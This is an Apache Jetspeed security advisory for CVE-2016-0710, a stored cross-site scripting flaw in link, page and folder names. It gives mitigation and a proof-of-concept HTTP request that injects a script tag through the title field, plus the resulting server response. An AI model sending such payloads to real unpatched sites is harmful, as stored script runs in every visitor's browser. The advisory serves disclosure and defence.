CVE-2016-0710: Persistent Cross Site Scripting in links, pages and folders Severity: Important
Vendor: The Apache Software Foundation Versions Affected: Jetspeed 2.2.0 to 2.2.2 Jetspeed 2.3.0 The unsupported Jetspeed 2.1.x versions may be also affected Description: The functionality to add a link, page, or folder, is vulnerable to persistent Cross Site Scripting. This is because it is possible to include HTML tags in the object's name, such as is the example below where a page object is being renamed after creation. Mitigation: 2.2.0 - 2.3.0 users should upgrade to 2.3.1 Example: Given this AJAX request: POST /jetspeed/services/pagemanagement/info/.psml/_user/andreas/foobar.psml? _type=json HTTP/1.1 Host: 192.168.2.4:8080 User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:43.0) Gecko/20100101 Firefox/43.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate X-Requested-With: XMLHttpRequest Content-Type: application/x-www-form-urlencoded; charset=UTF-8 Referer: http://192.168.2.4:8080/jetspeed/ui/_user/andreas/foobar.psml Content-Length: 60 Cookie: JSESSIONID=F95E2034A086BE172EF816FF2C853BE9; JS2TOOLBOX=TAB=theme&CAT=Administration Connection: close title=foobar</a></li><script>alert(document.domain)</script> Which results in the following content in the server response: <meta http-equiv="content-type" content="text/html; charset=UTF-8"/> <title>foobar</a></li><script>alert(document.domain)</script></title> Note that this code will be executed every time someone visits that space. Credit: This issue was discovered by Andreas Lindh References: http://tomcat.apache.org/security.html --------------------------------------------------------------------- To unsubscribe, e-mail: jetspeed-user-unsubscr...@portals.apache.org For additional commands, e-mail: jetspeed-user-h...@portals.apache.org
